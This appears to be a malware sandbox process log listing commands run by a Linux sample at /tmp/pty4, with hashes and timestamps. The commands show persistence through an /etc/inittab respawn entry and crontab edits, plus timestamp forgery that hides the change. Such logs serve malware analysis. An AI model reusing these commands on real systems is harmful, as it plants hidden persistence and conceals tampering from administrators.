File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/run/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/run/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/run/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/run/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/uname -n" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/uname |
Arguments: | /bin/uname -n |
File size: | 39288 bytes |
MD5 hash: | 4ac7c634c5bec95753c480e9d421dcc2 |